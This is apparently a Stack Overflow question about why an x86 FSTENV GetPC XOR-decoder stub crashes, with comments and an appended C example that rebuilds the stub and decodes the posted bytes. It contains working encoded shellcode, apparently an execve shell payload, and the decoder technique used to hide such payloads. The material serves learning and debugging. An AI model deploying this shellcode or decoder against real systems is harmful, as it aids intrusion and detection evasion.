
I have been trying to create a shellcode which takes an XOR-encoded shellcode using the FSTENV GetPC technique, decodes it and passes control to it. The code is:

global _start
section .text 
_start:

        fldz
        fstenv [esp -0xc]
        pop esi
        add esi , 0x11

decode:
        xor byte [esi] , 0xAA
        jz Shellcode
        inc esi
        jmp short decode


    Shellcode : db 0x9b,0x6a,0xfa,0xc2,0xc8,0xcb,0xd9,0xc2,0xc2,0xc8,0xc3,0xc4,0x85,0xc2,0x85,0x85,0x85,0x85,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa

This code is based off another similar code which I wrote:

global _start
section .text
_start:
        jmp short call_decoder
decoder :
        pop esi
decode:
        xor byte [esi] , 0xAA
        jz Shellcode
        inc esi
        jmp short decode
call_decoder:
        call decoder
        Shellcode : db 0x9b,0x6a,0xfa,0xc2,0xc8,0xcb,0xd9,0xc2,0xc2,0xc8,0xc3,0xc4,0x85,0xc2,0x85,0x85,0x85,0x85,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa

Now, when compiled and executed using nasm, both of them result in a segmentation fault. However, when used in a C program, the first one doesn't seem to work and results in a segmentation fault, while the second one works just fine.

Also, analysis with GDB shows that in the first one the error occurs at the XOR instruction. The GDB output is as follows:

Program received signal SIGSEGV, Segmentation fault.
Dump of assembler code from 0x804806b to 0x8048075:
=> 0x0804806b <decode+0>:       xor    BYTE PTR [esi],0xaa
   0x0804806e <decode+3>:       je     0x8048073 <Shellcode>
   0x08048070 <decode+5>:       inc    esi
   0x08048071 <decode+6>:       jmp    0x804806b <decode>
   0x08048073 <Shellcode+0>:    fwait
   0x08048074 <Shellcode+1>:    push   0xfffffffa
End of assembler dump.
0x0804806b in decode ()

hook-stop is defined as:

disas $eip, +10

And meanwhile ESI points to the first byte of the shellcode [as expected?]:

(gdb) x/xb $esi
0x8048073 <Shellcode>:  0x9b 

The commands used to create the executable are:

nasm -f elf32 -o <Linker Object> <Nasm File>
ld -o <Executable Name> <Linker Object>

So where is the first code going wrong, and how do I rectify it?

PS: I used a reference from Here

  • Use the debugger to verify that `[esi],0xaa` points to a valid memory address. – paulsm4 Sep 19 '20 at 22:17
  • `.text` section is read-only by default. Make it writable. You did not show the commands you used to produce the executable. – Jester Sep 19 '20 at 22:23
  • @paulsm4 as I said, $esi points to the first byte of the shellcode. – WhoKilledDB Sep 20 '20 at 05:53
  • @Jester I added the details. Also, I know the `.text` section is not writeable and the segmentation fault is expected to happen, but when the shellcode is fed into a C program, the first one doesn't work but the second one does! – WhoKilledDB Sep 20 '20 at 06:06
  • Clearly once you fixed the RWX page permissions bug, the first one had some other bug that also led to a crash. You only posted machine code, not disassembly. Use a debugger to find the crash in the one that doesn't work, and debug it. – Peter Cordes Sep 20 '20 at 13:11
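The following is an added example, not code from the question or from the page it references. It builds the same FNSTENV GetPC decoder stub as raw machine code and checks the one number the first listing computes by hand: the `add esi, imm8` immediate, which has to equal the byte count from `fldz` (the address FNSTENV records as the FPU instruction pointer) to the first encoded byte. Two facts matter for that count: NASM's `fstenv` is the waiting form and assembles with a `9B` (fwait) prefix, one byte longer than `fnstenv`; and the decoder's `jz Shellcode` fires when an encoded byte XORs to zero, so the plaintext must be null-free and the encoded blob must end in the key byte. The example decodes the bytes posted in the question in software (it never executes them, so it runs on any host), re-encodes them to confirm the round trip, and patches the immediate in from the assembled stub length instead of counting. The instruction encodings in the comments are the standard IA-32 ones; everything else (function names, buffer sizes) is this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KEY 0xAA  /* XOR key used by the decoder in the question */

/* Encoded payload exactly as posted in the question. The trailing 0xAA is the
 * terminator: it XORs to 0x00, which is what `jz Shellcode` keys on. */
static const uint8_t posted_encoded[] = {
    0x9b,0x6a,0xfa,0xc2,0xc8,0xcb,0xd9,0xc2,0xc2,0xc8,0xc3,0xc4,0x85,0xc2,0x85,0x85,
    0x85,0x85,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a,0xaa
};

/* Software model of the decode loop (xor byte [esi],KEY ; jz ; inc esi ; jmp).
 * Returns the plaintext length, or -1 if no terminator was met within `len`
 * bytes, which is the case where a real run walks off the end of the data. */
int emulate_decode(const uint8_t *enc, size_t len, uint8_t *out, size_t outcap)
{
    for (size_t i = 0; i < len && i < outcap; i++) {
        uint8_t b = enc[i] ^ KEY;
        if (b == 0)                    /* jz Shellcode */
            return (int)i;
        out[i] = b;
    }
    return -1;
}

/* Encode a payload for that loop. A 0x00 in the plaintext encodes to KEY and
 * would be taken as the terminator, so such payloads are rejected. */
int encode_payload(const uint8_t *plain, size_t len, uint8_t *out, size_t outcap)
{
    if (len + 1 > outcap) return -1;
    for (size_t i = 0; i < len; i++) {
        if (plain[i] == 0x00) return -1;
        out[i] = plain[i] ^ KEY;
    }
    out[len] = KEY;                    /* terminator, plaintext 0x00 */
    return (int)len + 1;
}

/* Emit the GetPC decoder stub as machine code. FNSTENV writes the 28-byte FPU
 * environment; the FPU instruction pointer (address of the last non-control FPU
 * instruction, here fldz) sits at offset 12, so with [esp-0xc] it lands at
 * [esp] and `pop esi` reads it. `add esi, imm8` must then equal the number of
 * bytes from fldz to the encoded data, which is the stub length because the
 * data follows the stub directly; it is patched in from `n`, not hand-counted.
 * use_wait=1 emits NASM's `fstenv` (waiting form, 9B prefix, one byte longer
 * than `fnstenv`), so the immediate changes accordingly. */
int build_stub(int use_wait, uint8_t *out, size_t outcap)
{
    uint8_t s[24];
    size_t n = 0, imm_at;
    s[n++] = 0xD9; s[n++] = 0xEE;                               /* fldz              */
    if (use_wait) s[n++] = 0x9B;                                /* fwait (fstenv)    */
    s[n++] = 0xD9; s[n++] = 0x74; s[n++] = 0x24; s[n++] = 0xF4; /* fnstenv [esp-0xc] */
    s[n++] = 0x5E;                                              /* pop esi           */
    imm_at = n + 2;
    s[n++] = 0x83; s[n++] = 0xC6; s[n++] = 0x00;                /* add esi, imm8     */
    /* decode: */
    s[n++] = 0x80; s[n++] = 0x36; s[n++] = KEY;                 /* xor byte [esi], KEY */
    s[n++] = 0x74; s[n++] = 0x03;                               /* jz Shellcode (+3 skips inc+jmp) */
    s[n++] = 0x46;                                              /* inc esi           */
    s[n++] = 0xEB; s[n++] = 0xF8;                               /* jmp short decode (-8) */
    s[imm_at] = (uint8_t)n;                                     /* Shellcode = fldz + n */
    if (n > outcap) return -1;
    memcpy(out, s, n);
    return (int)n;
}

/* The immediate the stub carries, for comparison with a hand-written `add`. */
int stub_getpc_offset(int use_wait)
{
    uint8_t s[24];
    int n = build_stub(use_wait, s, sizeof s);
    return n < 0 ? -1 : s[use_wait ? 10 : 9];
}

/* Decode the posted bytes, re-encode them, and confirm the round trip. */
int posted_payload_roundtrip(void)
{
    uint8_t plain[64], re[64];
    int n = emulate_decode(posted_encoded, sizeof posted_encoded, plain, sizeof plain);
    if (n < 0) return 0;
    int m = encode_payload(plain, (size_t)n, re, sizeof re);
    if (m != (int)sizeof posted_encoded || memcmp(re, posted_encoded, (size_t)m) != 0)
        return 0;
    /* plaintext begins with xor eax,eax (31 C0) and ends with int 0x80 (CD 80) */
    return plain[0] == 0x31 && plain[1] == 0xC0 && plain[n - 2] == 0xCD && plain[n - 1] == 0x80;
}

int main(void)
{
    uint8_t stub[24], plain[64];
    int n = build_stub(1, stub, sizeof stub);   /* the `fstenv` form used in the question */
    printf("stub (%d bytes), add esi, 0x%02x:", n, stub_getpc_offset(1));
    for (int i = 0; i < n; i++) printf(" %02x", stub[i]);
    printf("\nfnstenv form would need add esi, 0x%02x\n", stub_getpc_offset(0));
    int m = emulate_decode(posted_encoded, sizeof posted_encoded, plain, sizeof plain);
    printf("decoded %d bytes:", m);
    for (int i = 0; i < m; i++) printf(" %02x", plain[i]);
    printf("\nround trip %s\n", posted_payload_roundtrip() ? "ok" : "FAILED");
    return 0;
}
```

Running it prints 0x13 for the `fstenv` form and 0x12 for `fnstenv`; a stub whose immediate does not match lands `esi` inside the decoder itself, and the loop then XORs and jumps into its own bytes. Either stub still needs its page to be writable as well as executable, which the comments already note for `.text` (linking with `ld -N` or copying the blob into an RWX `mmap` region covers that). The second listing in the question avoids the constant entirely because `call decoder` pushes the address of the byte after the call, which is exactly `Shellcode`.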

0 Answers